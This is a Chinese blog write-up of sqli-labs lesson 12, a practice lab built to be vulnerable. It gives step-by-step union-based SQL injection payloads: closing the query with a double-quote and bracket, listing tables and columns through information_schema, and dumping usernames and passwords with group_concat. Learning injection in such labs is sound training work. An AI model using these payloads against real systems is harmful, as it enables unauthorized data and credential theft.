zoukankan      html  css  js  c++  java
  • sqli-labs(12)

    0X01摘要体现(小编这里傻逼了 可以直接用group_concat函数绕过显示问题我还在用limit绕过)

    还是这个模块  我们很熟徐那么先来尝试一下

    单引号加入

    无报错信息 哦豁 加入双引号试试呐

    哦豁 好像报错 了 还多了一个括号 那我们尝试一下闭合语句

    ") order by 1 #

    好像成功闭合了 哈哈 看来没有猜错 元语句应该是 id=("")

    那都知道了语句的闭合原理 那我们 开始我们的注入旅途吧 OK let’s go

    0X02爱之初体验 爆数据库

    ") union select null,database()#

     0X03就是一套组合拳了 爆破表名

    ") union select null,table_name from information_schema.tables where table_schema='security'#

    老规矩  他只显示了一个数据 我们可以用limit函数来一个一个拆解出来 嘿嘿

    ") union select null,table_name from information_schema.tables where table_schema='security'limit 1,1#

    0X04继续我们的组合拳 爆破列名

    ")union select  null,column_name from information_schema.columns where table_name='users' limit 0,1#

    0X05组合拳打到底  爆破字段名

    ") union select null,group_concat(username,0x3a,password) from users#

    舒舒服服

    完结

    切记 慢就是快

  • 相关阅读:
    使用php语言生成二维码
    简单的二级目录 操作
    上传图片 以及做成缩略图
    第一天 :学习node.js
    中文api接口
    PHP中获取当前页面的完整URL
    tp中session用来做权限方法 (缓解mysql压力)
    时间倒计时
    static关键字
    Windows程序内部运行原理简介
  • 原文地址:https://www.cnblogs.com/-zhong/p/10916063.html
Copyright © 2011-2022 走看看